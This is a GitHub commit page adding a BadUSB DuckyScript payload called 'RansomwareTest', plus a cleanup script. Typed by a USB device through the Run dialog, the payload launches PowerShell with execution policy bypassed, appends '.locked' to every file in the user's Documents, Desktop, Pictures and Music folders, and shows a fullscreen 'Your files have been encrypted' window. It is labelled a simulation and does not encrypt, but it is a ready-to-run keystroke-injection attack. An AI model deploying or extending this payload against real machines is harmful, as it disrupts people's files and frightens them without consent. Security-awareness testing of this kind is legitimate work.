Hardware-Hacking/BadUSB
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create RansomwareTest

Browse Source
This commit is contained in:
Mark
2024-05-18 12:06:50 -04:00
committed by GitHub
parent 491613a543
commit 75d74058f6
1 changed files with 69 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
RansomwareTest
+69
View File
@@ -0,0 +1,69 @@
# Main
REM This script was created by github.com/MarkCyber
REM This script is intended to act as a simulation of a ransomware attack
REM This script will change all file extensions to .locked rather than encrypting the files
REM This script will also display a simulated encrypted message
DELAY 1000
GUI r
DELAY 1000
STRING powershell -NoProfile -ExecutionPolicy Bypass -Command "
$locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music');
$errorOccurred = $false;
foreach ($loc in $locations) {
$path = [Environment]::GetFolderPath($loc);
$files = Get-ChildItem -Path $path -File;
foreach ($file in $files) {
try {
Rename-Item -Path $file.FullName -NewName ($file.Name + '.locked');
} catch {
$errorOccurred = $true;
}
}
}
if ($errorOccurred) {
Write-Host 'An error occurred while renaming files';
}
Add-Type -AssemblyName PresentationFramework;
$Window = New-Object System.Windows.Window;
$Window.WindowStartupLocation = 'CenterScreen';
$Window.WindowState = 'Maximized';
$Window.Topmost = $true;
$Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.';
$Window.ShowDialog();
"
ENTER
DELAY 1000
STRING exit
ENTER
# Cleanup
REM This script was created by github.com/MarkCyber
REM This is a follow-up script to the RansomwareSimulation
REM This script is to revert all changes from the RansomwareSimulation script
DELAY 1000
GUI r
DELAY 2000
STRING powershell -NoProfile -ExecutionPolicy Bypass -Command "
$locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music');
foreach ($loc in $locations) {
$path = [Environment]::GetFolderPath($loc);
$files = Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') };
foreach ($file in $files) {
Rename-Item -Path $file.FullName -NewName ($file.Name -replace '\.locked$', '');
}
}
"
ENTER
DELAY 1000
STRING exit
ENTER